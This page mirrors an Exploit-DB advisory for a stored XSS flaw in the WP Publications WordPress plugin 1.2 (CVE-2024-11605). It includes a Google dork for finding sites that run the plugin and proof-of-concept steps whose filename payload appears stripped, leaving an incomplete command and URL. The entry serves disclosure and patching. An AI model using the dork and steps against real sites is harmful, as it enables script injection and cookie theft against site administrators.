WP Publications WordPress Plugin 1.2 – Stored XSS

July 16, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title WP Publications WordPress Plugin 1.2 – Stored XSS
Exploit ID EDB-ID:52368
Type exploitdb
Published 2025-07-16T00:00:00
Modified 2025-07-16T00:00:00

CVSS Information

CVSS Score 4.8
Severity MEDIUM
Vector CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CVE Information

  • CVE-2024-11605

Exploit Description

Exploit Title: WP Publications WordPress Plugin…

Exploit Code

# Exploit Title: WP Publications WordPress Plugin 1.2 – Stored XSS

# Google Dork: inurl:/wp-content/plugins/wp-publications/

# Date: 2025-07-15

# Exploit Author: Zeynalxan Quliyev

# Vendor Homepage: https://wordpress.org/plugins/wp-publications/

# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip

# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)

# CVE: CVE-2024-11605

## Vulnerability Details

The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code. This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups). — ## Proof of Concept (PoC) 1. SSH into the server and navigate to the plugin directory:
“`bash

cd /var/www/html/wp-content/plugins/wp-publications/

“`

2. Run the following command to create a malicious BibTeX file:

“`bash

touch “.bib”

“`

3. Access the plugin’s BibTeX browser via the following URL:

“`

https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=

“`

4. The injected JavaScript will be executed, triggering the XSS payload:

“`javascript

alert(‘XSS’);

“`

## Impact

* Stored XSS (JavaScript) is executed in the context of the admin panel.

* Bypasses `unfiltered_html` protection in multisite environments.

* Can be used for privilege escalation, cookie theft, or injecting malicious content.

## Recommendation

Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.

## References

* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)

* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.